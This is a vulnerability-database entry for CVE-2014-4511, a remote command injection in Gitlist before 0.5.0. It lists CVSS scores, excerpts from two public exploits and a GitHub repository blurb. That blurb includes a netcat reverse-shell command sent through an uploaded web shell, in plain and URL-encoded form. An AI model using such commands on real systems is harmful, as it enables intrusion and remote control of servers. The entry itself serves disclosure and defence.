7.5
CVSSv2

CVE-2014-4511

Published: 22/07/2014 Updated: 07/11/2023
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Gitlist prior to 0.5.0 allows remote malicious users to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

gitlist gitlist 0.2

gitlist gitlist 0.1

gitlist gitlist

gitlist gitlist 0.3

Exploits

Gitlist versions 040 and below suffer from a remote code execution vulnerability ...
from commands import getoutput import urllib import sys """ Exploit Title: Gitlist <= 040 anonymous RCE Date: 06/20/2014 Author: drone (@dronesec) Vendor Homepage: gitlistorg/ Software link: s3amazonawscom/gitlist/gitlist-040targz Version: <= 040 Fixed in: 050 Tested on: Debian 7 More information: hatriot ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' ...

Github Repositories

CVE-2014-4511

gitlist-RCE CVE-2014-4511 example: after shell upload successfully: access: 1921681126/cache/xphp/?cmd=nc -nv 1921681127 1111 -e /bin/sh 1921681126/cache/xphp/?cmd=nc%20-nv%201921681127%201111%20-e%20/bin/sh